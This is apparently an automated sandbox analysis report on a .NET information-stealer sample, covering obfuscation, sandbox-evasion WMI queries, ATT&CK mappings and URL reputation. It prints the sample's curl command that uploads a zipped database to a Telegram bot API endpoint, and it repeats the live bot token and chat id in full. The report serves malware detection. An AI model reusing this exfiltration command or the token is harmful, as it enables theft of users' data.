          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: n0PDCyrFnf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: n0PDCyrFnf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.cs | .Net Code: Type.GetTypeFromHandle(SmsUid6a13C7uALaSAt.JIthwNIGq7(16777292)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(SmsUid6a13C7uALaSAt.JIthwNIGq7(16777240)),Type.GetTypeFromHandle(SmsUid6a13C7uALaSAt.JIthwNIGq7(16777237))})
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Anti Malware Scan Interface: frOmBAse64stRInG('lVh/U9tIEv07VPEdplRULWSR+Z3lfMVWjG2CEwwctsOlznfOIA1Yi6zRzowMXsJ339czkiwDSQ5X2ZZGPT2vu1//sFeMvBUJO2Deb3tb7/6xu7f9brPeaBwfvTvf208/jm53/C/NvXZ797M46/zph7+l7f3OjN94y0srwZibTkh7/a3Nze2td3
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B6B378B push esp; iretd 0_2_00007FFD9B6B3791
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B75D00C push eax; iretd 0_2_00007FFD9B75D00D
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B756935 push eax; ret 0_2_00007FFD9B756959
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B991FF0 push eax; retf 0_2_00007FFD9B991FF1
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B99056C push eax; retf 0_2_00007FFD9B99056D
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B991F55 push eax; retf 0_2_00007FFD9B991F56
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B9D77B8 pushad ; retf 0_2_00007FFD9B9D7959
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B9D897A push edx; iretd 0_2_00007FFD9B9D897B
          Source: n0PDCyrFnf.exe | Static PE information: section name: .text entropy: 7.361258356562657
          Source: n0PDCyrFnf.exe, V6858m6FttC1TaEJs5I.cs | High entropy of concatenated method names: 'RwPmPJDCY4', 'AsZmLTgvoe', 'FsemFaalth', 'N2FmyKRtX6', 'IkAmuWvSk2', 'lQHmMcLdKe', 'H0JmS4kpyA', 'MnQAibkTn1', 'RRxmswbL3Q', 'QxNmEqt0kQ'
          Source: n0PDCyrFnf.exe, GZJp6062PcAiGVFakbJ.cs | High entropy of concatenated method names: 'qXD60fVmaY', 'GTt6nEWnBW', 'Jhi6wPD62Y', 'o2k6cMsbYP', 'Ouu64XPsM0', 'hqB6DqFDl5', 'iV96oKAsch', 'UhK6KQQJZY', 'jIv6PLlC1U', 'wkW6LRcG7t'
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.cs | High entropy of concatenated method names: 'oidhVcUsyhMK9dIv0KB', 'Klj6ZTUEkbfqwQU0CMi', 'xIXqe83Wqh', 'doCyL0UtwdMWONdWcdZ', 'kOx1h7U8NSosli0mG5p', 'UUgt7SU7YRB1jQampwK', 'KFNGaxUeccfC7EGMvZn', 'jjMsHWUgHpoQO9aGOdP', 'WdGN9HUZ54OgbvC9jbg', 'BacMGBUJ5cbaYAOkx76'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_service
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Memory allocated: 1110000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Memory allocated: 1BD30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Window / User API: threadDelayed 5927
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Window / User API: threadDelayed 3806
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe TID: 5516 | Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystemProduct
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: curl.exe, 00000003.00000003.1792789597.000001CC6B8B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<<*
          Source: n0PDCyrFnf.exe, 00000000.00000002.1827332708.0000000020027000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: n0PDCyrFnf.exe, 00000000.00000002.1827881760.00000000200B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: amsi64_2588.amsi.csv, type: OTHER
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process created: C:\Windows\System32\curl.exe "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Users\user\Desktop\n0PDCyrFnf.exe VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\curl.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\database.zip VolumeInformation
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

Source: Yara match | File source: n0PDCyrFnf.exe, type: SAMPLE
Source: Yara match | File source: 0.0.n0PDCyrFnf.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: n0PDCyrFnf.exe, type: SAMPLE
Source: Yara match | File source: 0.0.n0PDCyrFnf.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 431 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 431 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
n0PDCyrFnf.exe | 28% | Virustotal |
n0PDCyrFnf.exe | 100% | Avira | HEUR/AGEN.1323575
n0PDCyrFnf.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
api.telegram.org | 2% | Virustotal |
171.39.242.20.in-addr.arpa | 0% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://aka.ms/winsvr-2022-pshelp | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://crl.v | 0% | URL Reputation | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_ | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessageP | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentX | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot$token/sendDocument | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC: | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 1% | Virustotal |
https://api.telegram.org | 1% | Virustotal |
http://www.t.com/pkiops/cersoft%20Time-Stam | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58 | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument8 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot$token/sendMessage | 0% | Avira URL Cloud | safe
http://go.microsoftLanguagePackManagement.psd1 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot$token/sendDocument | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument- | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument | 0% | Avira URL Cloud | safe
http://go.microsoftL | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram. | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot$token/sendMessage | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | true | | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_ | curl.exe, 00000003.00000003.1792740899.000001CC6B8BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793125910.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792855039.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelp | n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessageP | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentX | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot$token/sendDocument | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/License | n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC: | curl.exe, 00000003.00000002.1793058595.000001CC6B8A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.t.com/pkiops/cersoft%20Time-Stam | n0PDCyrFnf.exe, 00000000.00000002.1828302488.000000002015D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58 | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument8 | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot$token/sendMessage | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://go.microsoftLanguagePackManagement.psd1 | n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument- | curl.exe, 00000003.00000002.1793058595.000001CC6B8A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.microsoftL | n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.v | n0PDCyrFnf.exe, 00000000.00000002.1825821731.000000001C7F0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
